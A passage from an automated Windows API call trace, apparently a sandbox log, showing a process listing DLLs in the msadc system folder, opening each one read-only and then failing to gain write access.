hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0088.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.710] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44060e78, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x44060e78, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x44060e78, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x36200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdarem.dll", cAlternateFileName="")) returned 1 [0088.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0088.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.711] AreFileApisANSI () returned 1 [0088.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll", lpUsedDefaultChar=0x0) returned 55 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0088.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.712] AreFileApisANSI () returned 1 [0088.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75f30 [0088.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned 55 [0088.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.732] GetFileType (hFile=0x348) returned 0x1 [0088.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0088.732] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.732] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.733] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.733] CloseHandle (hObject=0x348) returned 1 [0088.733] AreFileApisANSI () returned 1 [0088.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0088.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned 55 [0088.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.733] GetLastError () returned 0x5 [0088.733] GetLastError () returned 0x5 [0088.733] SetLastError (dwErrCode=0x5) [0088.733] GetLastError () returned 0x5 [0088.733] SetLastError (dwErrCode=0x5) [0088.733] GetLastError () returned 0x5 [0088.733] SetLastError (dwErrCode=0x5) [0088.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0088.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.734] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4403ac10, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4403ac10, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4403ac10, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdaremr.dll", cAlternateFileName="")) returned 1 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a6f8 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0088.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0088.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.735] AreFileApisANSI () returned 1 [0088.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll", lpUsedDefaultChar=0x0) returned 56 [0088.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.735] AreFileApisANSI () returned 1 [0088.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0088.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned 56 [0088.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.735] GetFileType (hFile=0x348) returned 0x1 [0088.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0088.735] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.736] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.736] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.736] CloseHandle (hObject=0x348) returned 1 [0088.736] AreFileApisANSI () returned 1 [0088.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0088.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned 56 [0088.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.736] GetLastError () returned 0x5 [0088.736] GetLastError () returned 0x5 [0088.736] SetLastError (dwErrCode=0x5) [0088.736] GetLastError () returned 0x5 [0088.736] SetLastError (dwErrCode=0x5) [0088.737] GetLastError () returned 0x5 [0088.737] SetLastError (dwErrCode=0x5) [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.737] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdfmap.dll", cAlternateFileName="")) returned 1 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0088.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0088.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0088.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.738] AreFileApisANSI () returned 1 [0088.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll", lpUsedDefaultChar=0x0) returned 55 [0088.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.738] AreFileApisANSI () returned 1 [0088.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75cd8 [0088.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned 55 [0088.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.741] GetFileType (hFile=0x368) returned 0x1 [0088.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.741] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.742] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.742] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.742] CloseHandle (hObject=0x368) returned 1 [0088.742] AreFileApisANSI () returned 1 [0088.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75d50 [0088.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned 55 [0088.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.742] GetLastError () returned 0x5 [0088.742] GetLastError () returned 0x5 [0088.742] SetLastError (dwErrCode=0x5) [0088.742] GetLastError () returned 0x5 [0088.742] SetLastError (dwErrCode=0x5) [0088.742] GetLastError () returned 0x5 [0088.743] SetLastError (dwErrCode=0x5) [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.743] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: 